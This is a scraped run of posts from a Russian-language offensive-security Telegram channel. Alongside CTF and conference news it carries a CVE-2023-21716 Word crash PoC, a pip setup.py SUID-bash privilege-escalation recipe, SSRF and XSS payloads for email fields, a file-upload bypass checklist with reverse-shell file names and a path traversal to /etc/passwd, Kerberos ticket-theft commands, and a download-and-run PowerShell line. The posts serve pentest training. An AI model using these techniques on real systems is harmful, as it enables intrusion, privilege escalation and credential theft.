Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
LDAP shell

Этот проект является форком проекта ldap_shell - impacket.

Подготовка:
sudo apt install -y python3

Установка:
git clone https://github.com/z-Riocool/ldap_shell.git ;cd ldap_shell ; python3 -m pip install .

Пример использования:
ldap_shell.py domain.local/user:password
ldap_shell domain.local/user:password -dc-ip 192.168.1.2
ldap_shell domain.local/user -hashes aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404e1
export KRB5CCNAME=/home/user/ticket.ccache
ldap_shell -k -no-pass domain.local/user

#tools
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python

RTF Crash POC Python 3.11 Windows 10

PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join( ("{\\f%dA;}\n" % i) for i in range(0,32761) ) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE
22 апреля пройдет task-based КибХак CTF совместно с mireaCTF (Potee) в режиме онлайн.

👻 За призовые места вы сможете получить фирменные стикеры КибХак и ценные денежные призы. В том числе по результатам соревнований будут вручены проходки на предстоящую конференцию Positive Hack Days 12. А также, возможно, одна из команд сможет пойти на пхд и посоревноваться там 😊

Правила те же, что и всегда: команды решают задания по информационной безопасности и получают «флаги», за которые начисляются баллы.

❗️ Начало в 18:00
👨‍💻 Длительность 18 часов до 12:00 воскресенья

Будут представлены задачи следующих категорий:
crypto, forensics, misc, osint, reverse, stego, web

В каждой команде должно быть не более 5-ти человек

Вся информация будет в канале mireaCTF:
https://t.me/mireactf

И в беседах КибХак и mireaCTF:
https://t.me/+TS7yGrOwxSJZP8Q3
https://t.me/+SFTJE5BHTJ0PoHq4

Регистрация уже доступна на:

https://ctf.potee.ru
🔥2🐳1🗿1
Forwarded from RedTeam brazzers (Миша)
Injector.png
1.1 MB
Итак, продолжаем заниматься импортозамещением учиться быть настоящим Red Team'ом и не использовать mimikatz! Недавно у меня вышла статья по инжекту тикетов с помощью плюсовой программы. Но потом мы вспоминаем об антивирусах и становится не так весело. Каждый раз брать проект, добавлять защиту, перекомпиливать... не вариант.
Поэтому появилась идея создания инжектора билетов на Powershell. Во-первых, это удобно, во-вторых, защищать и обфусцировать намного быстрее. Есть как готовые фреймворки , так и статьи с инструкциями.

Результатом работы стал небольшой скрипт, который должен помочь атакующему во время тестирования на проникновение. Теперь вы можете инжектить тикеты, используя Powershell! Поддерживаются два режима работы:
1. Инжект тикета, предоставленного в файле .kirbi
2. Инжект тикета, предоставленного в формате base64

Полный код можно увидеть на моем гитхабе


По любым вопросам, болячкам и возможным недочетам тулзы смело пишите мне :)
Forwarded from Monkey Hacker
Privilege Escalation via pip

Всеми наш любимый pip позволяет автоматически запускать код, когда разработчики просто загружают пакет. Таким образом мы можем скачать пакет и использовать эту возможность для повышения привилегий

После того, как мы сделали sudo -l. Мы видим, что pip download или pip setup можно запустить от sudo, так что давайте этим воспользуемся.
Сначала скопируем нужный нам репозиторий

Затем давайте сделаем некоторые изменения в файле setup.py. Импортируем os для запуска наших команд и в функции RunCommand поместим os.system("chmod u+s /bin/bash").

Собираем

python3 -m build

И скачиваем наш пакет

sudo pip3 download http://localhost/your-file.tar.gz

И теперь запустим шелл

bash -p

Have fun 👍

P.S
Полный код в комментариях

THX:
https://medium.com/checkmarx-security/automatic-execution-of-code-upon-package-download-on-python-package-manager-cd6ed9e366a8
Please open Telegram to view this post
VIEW IN TELEGRAM
3🐳1
​​Atomic Red Team

Всем привет! Извиняюсь, что давно не делал посты, загружен всем подряд. Постараюсь исправиться)
Я думаю многие из нас знакомы с Atomic Red Team. Но если нет, то давайте кратко пройдемся. Это некая библиотека PowerShell скриптов основанная на MITRE. Данный фреймворк предназначен не только для красной команды, но и для защитников, которые желают проверить свои же средства защиты. Этот фреймворк является самым популярным и полным "чек-листом" для проверки ИБ вашей рабочей среды.
Atomic Red Team предназначен не только для Windows, но и Linux + MacOS. Так что вы можете протестировать всё что вам нужно)

Команда для импорта тестов:
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); Install-AtomicRedTeam

Далее советую вам обратиться к этой и этой странице документации. Вы можете загрузить все тесты, но лучше конечно под конкретную операционную систему)

Пример запуска тестов:
Invoke-AtomicTest T1003.003 - просто запуск теста или группы тестов
Invoke-AtomicTest T1003.003 -TestNumbers 1,2 - вы выбрали только 1 и 2 тесты из группы
Invoke-AtomicTest T1003.003 -ShowDetails - вы сможете прочитать подробную информацию о конкретном тесте/ах

Для безумцев:
Invoke-AtomicTest All

Также советую вам посмотреть интересное видео от наших западных коллег об этом прекрасном инструменте)

#tools
6👍1
Media is too big
VIEW IN TELEGRAM
🔴PentestGPT

Дада, снова речь про ChatGPT, но стой, не закрывай канал. В данном случае ChatGPT выступает именно в роли помощника в пентесте. Ты задаешь ей цель, она тебе расписывает шаги для пентеста. Далее вы сами выполняете сканирование, скидываете результаты обратно ChatGPT и она анализирует ваши результаты. Звучит довольно круто, не правда ли?)

Пока ещё проект находится на стадии разработки, но вы уже можете оценить результаты на гитхабе разработчика. К посту прикреплено видео с "демонстрацией силы" бота.

По установке в посте её будет сложно уместить, так что советую перейти к гитхаб и там изучить её досконально.

#chatgpt #tools
6🔥1
Forwarded from SHADOW:Group
⚙️ Удобный вывод FFUF

Когда нужен читабельный вывод от ffuf:

ffuf -u https://target.com/FUZZ -w /mnt/data/SecLists/Discovery/Web-Content/raft-small-words.txt -o ffuf.csv -of csv

cat ffuf.csv | awk -F , '{print $2","$5","$6","$9}'| column -s, -t

#web #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Цены на TryHackMe повысятся в октябре этого года

Сейчас:
10$ ≈ 800 рублей

Будет:
14$ ≈ 1120 рублей

При курсе:
1$ = 80.14 рублей

Дневник Безопасника 🛡️
Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок

Ты сидишь за кла­виату­рой на одном из вер­хних эта­жей охра­няемо­го зда­ния, рас­положен­ного пос­реди зак­рытой тер­ритории в окру­жении забора с колючей про­воло­кой под нап­ряжени­ем. Ты чувс­тву­ешь себя в пол­ной безопас­ности — за ней сле­дят не толь­ко камеры, но и бди­тель­ная охра­на. За окном раз­дает­ся подоз­ритель­ное жуж­жание, ты отвле­каешь­ся на непонят­ный источник зву­ка, и этих нес­коль­ких секунд дос­таточ­но, что­бы на твой компь­ютер уста­новил­ся бэк­дор, а хакер, рас­положен­ный в 20 км от тебя, про­ник в кор­поратив­ную сеть. Фан­тасти­ка? Ничего подоб­ного!

#дроны
❤‍🔥3
charm_

Whatcha doing in a browser? You can try out our newest stuff right from the CLI.

#tools
Программирование. Кибербезопасность + Golang = ❤️

Всем привет! Подготовил для вас материал по топу библиотек на Golang, которые необходимы вам при безопасной разработке приложений. Топ будет составлен лично по моему мнению, а я не являюсь сеньором-помидором Go разработчиком, так что не кидайтесь гнилыми тапками.

#моя_статья
3
Forwarded from RedTeam brazzers (Миша)
Forwarded from RedTeam brazzers (Миша)
🔥 TGT Delegation Attack

TL;DR
Получить TGT пользователя, от лица которого у нас шелл:
Rubeus tgtdeleg /nowrap

kekeo tgt::deleg

Принцип работы:
Одна из самых интересных атак, в ходе которой у атакующего появляется возможность получения TGT-билета пользователя, просто имея лишь шелл от его лица. Сама атака основана на том, что запрос AP-REQ, содержащий TGT билет, передается в пользовательский контекст. Билет TGT будет содержаться в AP-REQ по той причине, что мы обращаемся к службе с неограниченным делегированием. А службе с неограниченным делегированием он нужен потому, что она служба с неограниченным делегированием :) Благодаря этому TGT служба сможет олицетворять клиента. AP-REQ шифруется на сессионном ключе, который клиент получает в запросе TGS-REP. Этот сессионный ключ необходим для безопасной и зашифрованной связи с целевой службой. Этот сессионный ключ после получения будет находиться в памяти процесса lsass (точнее, внутри пакета аутентификации Kerberos), поэтому мы можем легко взять этот ключ, а затем использовать его для расшифровки AP-REQ. А из AP-REQ не составит проблем извлечь TGT текущего пользователя. Эта атака может быть выполнена даже от лица низкопривилегированной учетной записи.

Вопреки распространенному мнению, хочу отметить, что в ходе атаки все равно будет присутствовать взаимодействие с LSA. Так как именно из LSA мы сможем получить сессионный ключ для декрипта AP-REQ.

Но где же взять службу с неограниченным делегированием? По умолчанию все контроллеры домена настроены на неограниченное делегирование.

Особенности написания собственного инструментария:

Во-первых, я принял решение о том, что следовало бы добавить два различных режима работы:
- С указанием SPN целевой службы
- С указанием домена (автоматический поиск службы с неограниченным делегированием)

Но почему же инструмент выводит только сессионный ключ и AP-REQ? А где TGT?

Проблема в том, что kekeo и Rubeus используют неописанный криптоинтерфейс Windows (CDLocateCSystem()) для расшифровки AP-REQ. А использование этого криптоинтерфейса обычными программами очень редко, поэтому почти все EDR сразу пометят наш инструмент как вредоносный. Вот фрагменты кода, в которых эта функция вызывается:

- https://github.dev/gentilkiwi/kekeo/blob/de98fa66790d8d3ed37a43879d7213ea218a2ed6/kekeo/modules/kuhl_m_tgt.c#L510

- https://github.dev/gentilkiwi/kekeo/blob/d3ee2ae2fdeb5581fe2be1d53838f66729c3de16/modules/asn1/kull_m_kerberos_asn1_crypto.c#L86

- https://github.dev/GhostPack/Rubeus/blob/dd5472f5af3ee71a99eed2f890e4edb7b80ebf18/Rubeus/lib/Crypto.cs#l123


А вот описание этой функции в гугле:
- https://imgur.com/a/wKGRv4k

Но не стоит отчаиваться. Мы можем просто взять сессионный ключ и AP-REQ, а расшифровку провести просто на машине атакующего, что будет, конечно, чуточку медленнее, но зато наш инструментарий останется более чистым, незаметным и легитимным.

В дальнейшем с полученным TGT можно постоянно обновлять тикет через Rubeus renew .

Возможно ты захочешь отдать тикет в rubeus changepw , но это, пока по неизвестным для меня причинам, не увенчается успехом:
- https://imgur.com/a/2WyAuLg
🎉3
Атаки на механизм E-mail

Сегодня помог друзьям их сайт пентестить и нашел blind ssrf, xss, обычный ssrf в одной email форме
И хочу поделится как находить такое, т.к. часто в вебе есть форма email

➡️Мыло имеет свою валидацию
Примеры как можно писать:
🟢 keklol@"payload"test.com
🟢 keklol@test.com(payload)
🟢 keklol(payload)@test.com
🟢 keklol@[payload]
🟢 keklol@(payload)test.com
🟢 "payload"@test.com

➡️ Валидность можно проверить тута

🟢Blind SSRF: keklol@сюда ссылку барп коллабратора
🟢SSRF: keklol@[127.0.0.1]
🟢XSS: keklol@test(<script>alert(0)</script>).com

➡️ Нет Burp Collabrator'a 🤬
Аналоги:
🟢https://canarytokens.org
🟢https://webhook.site
🟢https://app.interactsh.com
🟢https://hookdeck.com

📌 Больше техник и уязвимостей с механизмом мыла можно глянуть в этой презентации от баунти-хантера ссылка
И в видосе ссылка

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🐳1
Forwarded from Just Security
Уязвимости в функциях загрузки файлов очень распространены.

При проведении анализа защищенности веб-приложений, важно знать, как обойти ограничения, так как это часто приводит к полной компрометации системы. А для разработчиков и инженеров полезно знать, как такие атаки происходят, чтобы корректно реализовать механизмы защиты.

Минимальный набор проверок File Upload:

Попробуйте различные расширения файлов: используйте разные варианты расширений файлов, например, php3, php4, php5, phtml для PHP-скриптов, asp, aspx и ashx для IIS. Список можно взять тут: https://github.com/danielmiessler/SecLists

Добавьте дополнительное расширение файла: если приложение не проверяет правильность расширения файла — добавьте еще одно расширение, например, из script.php в script.gif.php

Неправильная реализация Regex: например, некорректное регулярное выражение ".png|.jpeg" можно обойти с помощью следующей нагрузки bypasspng.php.

Измените регистр расширения: попробуйте разные комбинации строчных и прописных букв, например, pHp, PhP, phP, Php и т.д.

Приложение позволяет загружать файлы .svg?: SVG изображения — это просто данные XML. Используя XML, можно, например, добиться XSS.

Измените тип контента: при перехвате запроса с помощью Burp Suite, тип контента можно изменить, например, с "Content-type: application/x-php" на "Content-type: image/gif"

Добавьте magic байт в файл: магические байты служат подписями, которые используются веб-сервером для определения типа загружаемого файла. Например, добавив GIF87a в начало скрипта, сервер будет считать его файлом GIF. Например : Filename='1.php' , filetype: image/gif и начните содержимое файла с GIF29a

Попробуйте уменьшить размер файла: если используется ограничение размера файла, можно загрузить меньший скрипт для удаленного выполнения кода.

Попробуйте использовать исполняемые расширения: могут быть разрешены определенные исполняемые расширения, например .phtml, .shtml, .asa, .cer, .asax, .swf, или .xap.

Добавьте нулевой байт в имя файла: если сайт использует белые списки расширений файлов, их часто можно обойти, добавив %00 (HTML) или \x00 (hex) в конец имени файла. Например: php-reverse-shell.php%00.gif

Добавьте специальные символы перед расширением файла: на старых веб-серверах, добавление специальных символов, таких как ;%$&, сразу после имени файла, например, shell;.php, может помочь обойти белые списки расширений файлов.

Вставьте данные EXIF: исполняемый скрипт может быть вставлен в изображение в форме метаданных комментария, который затем будет выполнен, если веб-сервер обрабатывают эти данные.

Попробуйте использовать обозначение Windows 8.3 для имени файла: можно использовать короткую версию имени файла Windows 8.3. Например, shell.aspx станет SHELL~1.ASP

→ Попробуйте добавить нейтральные символы после имени файла: специальные символы, такие как пробелы или точки в Windows, или точки и слэши в Linux в конце имени файла, будут автоматически удалены (например, shell.aspx … … . . .. .., file.asp.).

Обход каталога: попробуйте использовать вместо имени файла ../../../../etc/passwd и подобные, возможно, вы наткнетесь на новую уязвимость

Полезные ссылки:

- Перезапись файла конфигурации сервера
- Обфускация расширений файлов
- Race condition при загрузке файлов
- Небезопасная десериализация, ведущая к полному захвату сервера
- OWASP Unrestricted File Upload

Накидывайте еще способы обхода и полезные ссылки по теме в комментарии!
Ждем интересный пост про ChatGPT + промты для пентеста/OSINT)
Anonymous Quiz
71%
Да
29%
Очень да
🐳3
Вижу, что ждем и очень ждем 😉

В скором времени выкачу первую часть 😊
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥7
Forwarded from Monkey Hacker
Произошел абьюз PPL

Механизм Windows Protected Process Light (PPL) обеспечивает защиту от малварей. Windows Code Integrity (CI), которая гарантирует, что процессы PPL будут запускать только код со специальными подписями от Microsoft или других доверенных поставщиков.

Однако байпасс PPL особенно интересен, поскольку Microsoft считает PPL мерой защиты, а не формальной границей безопасности, поэтому эти ошибки не подлежат исправлению.

Чувак на BlackHat Asia 2023 (буквально недавно), представил интересные атаки: PPLFault и GodFault

Держите 👍

https://github.com/gabriellandau/PPLFault
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Forwarded from Positive Technologies
🎊 Уже в пятницу в московском Парке Горького начнется киберфестиваль Positive Hack Days 12!

Он будет проходить два дня, 19 и 20 мая, и будет доступен бесплатно для всех желающим. Приходите всей семьей!

Мы подготовили для вас футуристичные инсталляции и обширную программу, которая поможет вам разобраться, как устроен современный цифровой мир и повысить уровень своей защищенности.

В Кибергороде на территории парка вас будут ждать:

🐴 Арт-объект «Троян vs Кибергеоргий». Прямо у подножья арт-объекта будет находиться музей «Хранилище кибермонстров», где вы сможете узнать много нового о фишинговых рассылках, ловушках в соцсетях и приложениях для знакомств.

🚗 «Шоссе киберэнтузиастов» — одна из самых оживленных улиц, трафик на которой и работу светофоров полностью регулировала система умного перекрестка. Но хакеры ее взломали, что стало причиной крупной аварии.

🎪 «Скамотопия» — парк развлечений во главе с эксцентричным хозяином. Вас ждет множество аттракционов и шоу-программа от цирковых артистов, но будьте осторожны: здесь повсюду обман. Не попадитесь на уловки мошенников, пока выполняете задания в Скамотопии!

Также для всех участников киберфестиваля смогут пройти квест, в котором нужно будет помочь исследователям безопасности защитить Кибергород от хакеров и получить за это ценные призы! 🎁

На главной сцене парка эксперты крупнейших технологических компаний расскажут, как защищать свои аккаунты в соцсетях, поделятся, что хакерам известно о ваших паролях, а также погрузят вас в мир WEB 3.0.

🕺 Завершится PHDays 12 концертом «МаякФест», посвященным Владимиру Маяковскому. На концерте прозвучат песни на его стихи в сопровождении симфонического оркестра, а также стихи современных поэтов.

До встречи 19 и 20 мая в Парке Горького!

#PHD12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM